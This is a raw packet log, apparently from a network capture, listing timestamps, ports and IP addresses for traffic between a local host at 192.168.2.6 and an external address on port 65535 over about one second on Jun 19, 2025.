Jun 19, 2025 12:58:50.215631962 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.215658903 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.215692997 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.222187996 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.222213984 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.222227097 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.222239971 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.222245932 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.222275019 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.264592886 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.377903938 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.377917051 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.377927065 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.377940893 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.377952099 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.377963066 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.377978086 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.377979040 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.377990961 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378005028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378016949 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378031969 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378043890 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378052950 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378057957 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378071070 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378082991 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378087997 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378096104 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378108978 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378118038 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378118038 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378123045 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378135920 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378145933 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378151894 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378158092 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378165007 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378170013 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378176928 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378182888 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378192902 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378200054 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378200054 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378206015 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378216028 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378216028 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378218889 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378231049 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378248930 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378259897 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378263950 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378276110 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378285885 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378288984 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378298998 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378310919 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378313065 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378323078 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378334999 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378345966 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.378350019 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378374100 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378374100 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.378396988 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.412636042 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.412655115 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.412723064 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.419553041 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419567108 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419579029 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419594049 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419605970 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419620037 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419620037 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.419631958 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419645071 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.419661999 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.419711113 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.462018013 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.462032080 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.462104082 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.576531887 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.576603889 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.576955080 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.576968908 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577009916 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577075958 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577101946 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577115059 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577126026 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577138901 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577151060 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577151060 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577162027 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577164888 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577174902 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577188015 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577197075 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577197075 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577203035 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577218056 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577219963 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577230930 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577239990 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577244043 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577255964 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577258110 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577270985 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577281952 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577291012 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577295065 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577310085 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577322006 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577322006 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577334881 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577346087 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577354908 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577358961 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577364922 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577372074 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577373981 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577385902 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577394009 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577398062 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577411890 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577419043 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577425003 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577435970 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577447891 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577447891 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577467918 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577470064 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577470064 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577480078 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577481031 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577495098 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577505112 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577511072 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577518940 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577532053 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577543020 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577552080 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577554941 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577564001 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577569008 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577581882 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577596903 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577598095 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577606916 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577606916 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577641010 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577717066 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577729940 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577744007 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577756882 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.577766895 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577784061 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.577815056 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578073025 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578085899 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578097105 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578115940 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578126907 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578130960 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578150988 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578174114 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578191042 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578205109 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578216076 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578227997 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578233004 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578242064 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578254938 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578263044 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578263044 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578269005 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578283072 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578294039 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578305006 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578319073 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578332901 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578346014 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578357935 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578371048 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578381062 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578381062 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578381062 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578383923 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578396082 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578408003 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578408957 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578422070 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578434944 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578434944 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578447104 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578453064 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578453064 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578463078 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578474998 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578483105 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578486919 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578500986 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578507900 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578511953 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578524113 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578525066 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578537941 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578550100 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578556061 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578562021 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578572989 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578582048 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578586102 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578589916 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578589916 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578598976 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578612089 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578623056 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578625917 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578638077 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578649998 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578649998 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578661919 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578668118 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578674078 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578686953 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578690052 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578694105 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578701019 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578713894 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578716040 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578727007 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578737020 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578737020 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578744888 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578758955 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.578759909 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578778028 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.578799963 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.579055071 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.610373974 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.610398054 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.610452890 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.610492945 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.617634058 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617650032 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617661953 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617675066 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617686987 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617696047 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.617701054 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617717028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617732048 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617743015 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617752075 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.617755890 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617774010 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617784977 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.617784977 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.617788076 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.617808104 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.617808104 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.617835999 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.659661055 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.659727097 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.773818970 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.773833036 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.773948908 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.774430037 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.774445057 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.774482965 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.774547100 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815340042 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815362930 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815376043 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815390110 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815402985 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815407038 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815422058 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815433979 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815439939 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815462112 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815483093 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815511942 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815524101 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815535069 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815548897 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815556049 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815563917 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815577984 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815588951 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815599918 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815608025 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815608025 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815613031 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815625906 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815638065 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815646887 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815651894 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815665007 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815675020 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815676928 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815694094 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815705061 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815710068 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815716982 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815726995 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815730095 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815740108 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815746069 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815757990 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815769911 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815772057 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815783024 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815797091 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815809965 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815815926 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815826893 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815830946 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815845013 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815848112 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815859079 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815871000 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.815876007 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.815882921 CEST	65535	49692	91.92.120.101	192.168.2.6
